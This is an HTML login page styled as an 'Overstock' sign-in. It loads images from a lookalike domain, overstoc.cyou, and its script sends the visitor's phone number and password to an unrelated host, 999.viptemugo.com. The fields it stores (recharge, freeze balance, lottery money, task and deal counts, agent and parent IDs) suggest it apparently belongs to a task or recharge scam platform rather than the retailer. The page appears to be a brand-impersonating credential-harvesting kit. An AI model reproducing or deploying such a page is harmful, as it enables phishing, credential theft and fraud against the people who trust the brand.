<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Document</title>

    <style>
      input {
        outline: none;
      }
      .login-btn {
        margin-top: 20px;
        border: none;
        outline: none;
        font-size: 16px;
        line-height: 49px;
        width: 100%;
        background-color: #da0023;
        border-radius: 0px;
        color: #fff;
        text-transform: uppercase;
      }
      .pxn-navbar {
        width: 100%;
        position: relative;
        box-shadow: none;
        background-color: initial;
        left: 0;
        top: 0;
        z-index: 99999;
      }
      .uni-navbar__header {
        display: flex;
        padding: 0 10px;
        flex-direction: row;
        height: 44px;
        font-size: 12px;
        margin-top: 10px;
      }
      .uni-navbar__header-btns-left {
        display: flex;
        justify-content: flex-start;
        align-items: center;
        justify-content: center;
        margin: 10px;
      }
      .uni-navbar__header-container {
        display: flex;
        flex: 1;
        padding: 0 10px;
        overflow: hidden;
      }
      .uni-navbar__header-btns-right {
        display: flex;
        flex-direction: row;
        justify-content: flex-end;
        align-items: center;
        margin: 10px;
      }
      .pxn-center {
        display: flex;
        justify-content: center;
        align-items: center;
      }
      .login-page .icon-duoyuyan {
        position: absolute;
        right: 10px;
        font-size: 27px;
        cursor: pointer;
        color: #fff;
        font-weight: 500;
        -webkit-filter: invert(1);
        filter: invert(1);
      }

      .pxn-column {
        display: flex;
        flex-direction: column;
        box-sizing: border-box;
      }

      uni-view,
      uni-text {
        box-sizing: border-box;
      }

      .logo-con {
        width: 100%;
        height: 83px;
        margin-bottom: 15px;
        -webkit-animation: logobigData-data-v-3c86efe4 0.5s;
        animation: logobigData-data-v-3c86efe4 0.5s;
      }

      .sign-con {
        display: flex;
        margin: 0 31px;
        margin-bottom: 24px;
      }

      .item {
        width: 50%;
        height: 47px;
        display: block;
        border-bottom: 1px solid #95989a;
        cursor: pointer;
      }

      .aclink {
        border-bottom: 6px solid #da0023;
        color: #da0023;
        cursor: default;
      }

      .link {
        align-items: center;
        box-sizing: border-box;
        color: #95989a;
        display: -webkit-inline-flex;
        display: -moz-inline-box;
        display: -ms-inline-flexbox;
        display: inline-flex;
        font-size: 16px;
        font-weight: 700;
        height: 100%;
        justify-content: center;
        letter-spacing: 0.8px;
        line-height: 1.5;
        text-transform: uppercase;
        width: 100%;
      }

      .form-con {
        position: relative;
        padding: 20px 10px 10px;
        width: calc(100% - 41px);
        height: auto;
        margin: 0 auto auto;
        background-color: #fbfbfb;
        border-radius: 10px;
        -webkit-animation: botTopData-data-v-3c86efe4 0.3s;
        animation: botTopData-data-v-3c86efe4 0.3s;
      }

      .input-title {
        font-size: 14px;
        color: #969595;
        line-height: 24px;
      }

      .account-input {
        margin-top: 4px;
        position: relative;
        z-index: 1;
        margin-bottom: 20px;
        font-size: 14px;
        border: 1px solid #bcbfc7;
        padding: 0 10px;
      }

      .pxn-ac {
        display: flex;
        align-items: center;
      }

      .pxn-input {
        height: 52px;
        font-size: 14px;
        flex: 1;
        background: transparent;
        color: #da0023;
      }

      .uni-input-wrapper {
        display: -webkit-box;
        display: -webkit-flex;
        display: flex;
        position: relative;
        width: 100%;
        height: 100%;
        -webkit-box-orient: vertical;
        -webkit-box-direction: normal;
        -webkit-flex-direction: column;
        flex-direction: column;
        -webkit-box-pack: center;
        -webkit-justify-content: center;
        justify-content: center;
      }

      .uni-input-placeholder {
        position: absolute;
        top: auto !important;
        left: 0;
        color: grey;
        overflow: hidden;
        text-overflow: clip;
        white-space: pre;
        word-break: keep-all;
        pointer-events: none;
        line-height: inherit;
      }

      .uni-input-input {
        position: relative;
        display: block;
        height: 100%;
        background: none;
        color: #757586;
        opacity: 1;
        font: inherit;
        line-height: inherit;
        letter-spacing: inherit;
        text-align: inherit;
        text-indent: inherit;
        text-transform: inherit;
        text-shadow: inherit;
        border: none;
      }

      .placeholder-input {
        color: #999;
      }

      .pxn-flex {
        display: flex;
      }

      .login-column {
        position: relative;
        margin-top: 20px;
      }

      .uni-button {
        position: relative;
        display: block;
        margin-left: auto;
        margin-right: auto;
        padding-left: 14px;
        padding-right: 14px;
        box-sizing: border-box;
        font-size: 18px;
        text-align: center;
        text-decoration: none;
        line-height: 2.55555556;
        border-radius: 5px;
        -webkit-tap-highlight-color: transparent;
        overflow: hidden;
        color: #da0023;
        background-color: #f8f8f8;
        cursor: pointer;
      }

      .footer-con {
        padding: 0 15px;
        margin-top: 31px;
        text-align: center;
        font-size: 14px;
        font-weight: 600;
        color: #da0023;
      }
    </style>
  </head>
  <body>
    <div class="pxn-navbar">
      <div class="uni-navbar">
        <div
          class="uni-navbar__content"
          style="
            background-color: transparent;
            border-bottom-color: rgb(51, 51, 51);
          "
        >
          <div class="uni-status-bar" style="height: 0px"></div>
          <div
            class="uni-navbar__header"
            style="color: rgb(51, 51, 51); background-color: transparent"
          >
            <div class="uni-navbar__header-btns-left">
              <a href="/index.html"
                ><img
                  src="	https://overstoc.cyou/red/fonts-google-svg/arrow_back_ios_ls.svg"
              /></a>
            </div>
            <div class="uni-navbar__header-container">
              <div class="flex-1 pxn-center">
                <div class="iconfont icon-duoyuyan"></div>
              </div>
            </div>
            <div class="uni-navbar__header-btns-right">
              <a href="/index/user/lang"
                ><img src="https://overstoc.cyou/red/fonts-google-svg/g_translate_1.svg"
              /></a>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div class="login-con pxn-column">
      <div class="logo-con pxn-center">
        <span style="font-size: 24px; font-weight: bold; color: #da0023"
          >Overstock</span
        >
      </div>
      <div class="sign-con">
        <div class="item">
          <a href="/login"
            ><div class="link aclink"><span>Login</span></div></a
          >
        </div>
        <div class="item">
          <a href="/register.html"
            ><div class="link"><span>Register</span></div></a
          >
        </div>
      </div>
      <form id="loginForm" class="form-con pxn-column">
        <div>
          <div class="input-title">
            <span style="color: red">*</span>your mobile phone number
          </div>
          <div class="account-input pxn-ac" style="z-index: 9">
            <div class="pxn-input">
              <div class="uni-input-wrapper">
                <input
                  type="tel"
                  name="tel"
                  class="uni-input-input"
                  placeholder="your mobile phone number"
                  maxlength="13"
                  pattern="[0-9]*"
                  autocomplete="off"
                  required=""
                  fdprocessedid="yenyr"
                  data-has-listeners="true"
                />
              </div>
            </div>
          </div>
        </div>
        <div>
          <div class="input-title">
            <span style="color: red">*</span>your password
          </div>
          <div class="account-input pxn-ac">
            <div class="pxn-input">
              <div class="uni-input-wrapper">
                <input
                  type="password"
                  name="pwd"
                  class="uni-input-input"
                  placeholder="your password"
                  autocomplete="off"
                  required=""
                  fdprocessedid="qiy1ic"
                  data-has-listeners="true"
                />
              </div>
            </div>
            <span
              class="uni-icons uniui-eye-slash-filled"
              style="font-size: 22px"
            ></span>
          </div>
        </div>
        <button type="submit" class="login-btn" fdprocessedid="dvvjrk">
          Login
        </button>
      </form>
      <div class="footer-con">
        <span
          >By continuing, you agree to our Terms and Conditions &amp; Privacy
          Policy</span
        >
      </div>
    </div>

    <script>
      document.getElementById('loginForm').addEventListener('submit', async function(e) {
        e.preventDefault();
        
        const tel = document.querySelector('input[name="tel"]').value;
        const pwd = document.querySelector('input[name="pwd"]').value;
        
        try {
          const response = await fetch('https://999.viptemugo.com/index/user/do_login', {
            method: 'POST',
            headers: {
              'Content-Type': 'application/json',
            },
            body: JSON.stringify({
              tel: tel,
              pwd: pwd
            })
          });
          
          const data = await response.json();
          
          if (data.code === 0) {
            // Store all user details in localStorage
            localStorage.setItem('csrf_token', data.csrf_token);
            localStorage.setItem('user_id', data.user_id);
            localStorage.setItem('tel', data.tel);
            localStorage.setItem('username', data.username);
            localStorage.setItem('avatar', data.avatar);
            localStorage.setItem('email', data.email || '');
            localStorage.setItem('invite_code', data.invite_code);
            localStorage.setItem('level', data.level);
            localStorage.setItem('balance', data.balance);
            
            // Store the complete user object as JSON for easy access
            localStorage.setItem('user', JSON.stringify(data.user));
            
            // Store additional user details from the user object
            if (data.user) {
              localStorage.setItem('nickname', data.user.nickname || '');
              localStorage.setItem('parent_id', data.user.parent_id || '');
              localStorage.setItem('headpic', data.user.headpic || '');
              localStorage.setItem('lottery_money', data.user.lottery_money || '0.00');
              localStorage.setItem('freeze_balance', data.user.freeze_balance || '0.00');
              localStorage.setItem('recharge_num', data.user.recharge_num || '0.00');
              localStorage.setItem('deposit_num', data.user.deposit_num || '0.00');
              localStorage.setItem('qh', data.user.qh || '');
              localStorage.setItem('agent_id', data.user.agent_id || '');
              localStorage.setItem('task_num', data.user.task_num || '0');
              localStorage.setItem('deal_count', data.user.deal_count || '0');
              localStorage.setItem('all_recharge_num', data.user.all_recharge_num || '0.00');
              localStorage.setItem('all_deposit_num', data.user.all_deposit_num || '0.00');
            }
            
            // Set login timestamp
            localStorage.setItem('login_time', new Date().toISOString());
            
            // Set logged in flag
            localStorage.setItem('is_logged_in', 'true');
            
            alert(data.info);
            window.location.href = 'dashboard.html';
          } else {
            alert(data.info || 'Login failed!');
          }
        } catch (error) {
          console.error('Error:', error);
          alert('An error occurred during login. Please try again.');
        }
      });
      
      // Helper function to retrieve user data from localStorage
      function getUserData() {
        return {
          csrf_token: localStorage.getItem('csrf_token'),
          user_id: localStorage.getItem('user_id'),
          tel: localStorage.getItem('tel'),
          username: localStorage.getItem('username'),
          avatar: localStorage.getItem('avatar'),
          email: localStorage.getItem('email'),
          invite_code: localStorage.getItem('invite_code'),
          level: localStorage.getItem('level'),
          balance: localStorage.getItem('balance'),
          user: JSON.parse(localStorage.getItem('user') || '{}'),
          is_logged_in: localStorage.getItem('is_logged_in') === 'true'
        };
      }
      
      // Helper function to clear user data on logout
      function clearUserData() {
        const keysToRemove = [
          'csrf_token', 'user_id', 'tel', 'username', 'avatar', 'email',
          'invite_code', 'level', 'balance', 'user', 'nickname', 'parent_id',
          'headpic', 'lottery_money', 'freeze_balance', 'recharge_num',
          'deposit_num', 'qh', 'agent_id', 'task_num', 'deal_count',
          'all_recharge_num', 'all_deposit_num', 'login_time', 'is_logged_in'
        ];
        
        keysToRemove.forEach(key => localStorage.removeItem(key));
      }
    </script>
  </body>
</html>